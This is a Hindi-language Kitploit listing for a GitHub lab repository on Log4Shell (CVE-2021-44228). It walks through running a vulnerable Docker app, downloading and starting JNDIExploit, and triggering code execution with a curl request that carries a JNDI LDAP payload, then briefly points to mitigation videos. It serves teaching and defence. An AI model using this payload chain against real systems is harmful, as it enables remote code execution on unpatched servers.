Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4Shell — यह रिपॉजिटरी Log4j 2021 (CVE-2021-44228) भेद्यता प्रदर्शन और शमन के लिए है। | Kitploit
उपकरण/GitHubGitHub/feryaeljustice/log4shell
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubferyaeljustice/log4shell

Log4Shell

यह रिपॉजिटरी Log4j 2021 (CVE-2021-44228) भेद्यता प्रदर्शन और शमन के लिए है।

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell

यह रिपॉजिटरी Log4j 2021 (CVE-2021-44228) भेद्यता के प्रदर्शन और शमन के लिए है।

Log4Shell क्या है?

CVE-2021-44228 / Log4Shell भेद्यता में कमजोर सॉफ्टवेयर में एक दुर्भावनापूर्ण पेलोड इंजेक्ट करना शामिल है, जो Log4J से JNDI और LDAP प्रोटोकॉल के माध्यम से किसी तृतीय-पक्ष स्रोत से मान प्राप्त करने के लिए कहता है। ... आयातित डेटा कोड हो सकता है, जिसे Log4J सिस्टम पर निष्पादित करेगा।

प्रमाण की अवधारणा (वीडियो ट्यूटोरियल)

  1. हम Docker में CVE-2021-44228 के लिए कमजोर एक Spring Boot वेब एप्लिकेशन चलाते हैं, जिसे @christophetd द्वारा Log4Shell उपनाम दिया गया है। यह Log4j 2.14.1 (spring-boot-starter-log4j2 2.6.1 के माध्यम से) और JDK 1.8.0_181 का उपयोग करता है। docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app Log4Shell_1 Log4Shell_2

  • हम इस मामले में वेब आर्काइव से Log4Shell के लिए JNDI एक्सप्लॉइट डाउनलोड करते हैं, लेकिन आप इसे जहाँ भी उपलब्ध हो वहाँ से डाउनलोड कर सकते हैं। wget https://web.archive.org/web/20211211031401/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip Log4Shell_3 Log4Shell_4

  • हम अपनी मशीन का IP पता प्राप्त करते हैं जो Log4Shell एप्लिकेशन का Docker चला रही है। ifconfig Log4Shell_IP

  • हम Log4Shell के लिए JNDI एक्सप्लॉइट के साथ zip को अनज़िप करते हैं, इसलिए हमें JAR मिलता है और हम इसे चरण 3 में प्राप्त अपना IP डालकर निष्पादित करते हैं।

  • root@kitploit:~
    unzip JNDIExploit.v1.2.zip
    java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888
    

    Log4Shell_5

    1. फिर, इसका उपयोग करके एक्सप्लॉइट ट्रिगर करें: curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' Log4Shell_6
    • हम देखते हैं कि हमारी मशीन से JNDI कनेक्शन है, और हम Log4J द्वारा निष्पादित कोड देख सकते हैं। Log4Shell_7
    1. यह पुष्टि करने के लिए कि कोड निष्पादन सफल रहा, ध्यान दें कि कमजोर एप्लिकेशन चलाने वाले कंटेनर में फ़ाइल /tmp/pwned.txt बनाई गई थी। docker exec vulnerable-app ls /tmp Log4Shell_8

    शमन

    Windows और Linux में Log4Shell भेद्यता को कम करने के तरीके का वीडियो: MITIGATION

    Linux में शमन (उदाहरण चित्र)

    MITIGATION

    लेखक

    Feryael Justice 2022

    टूल डाउनलोड करें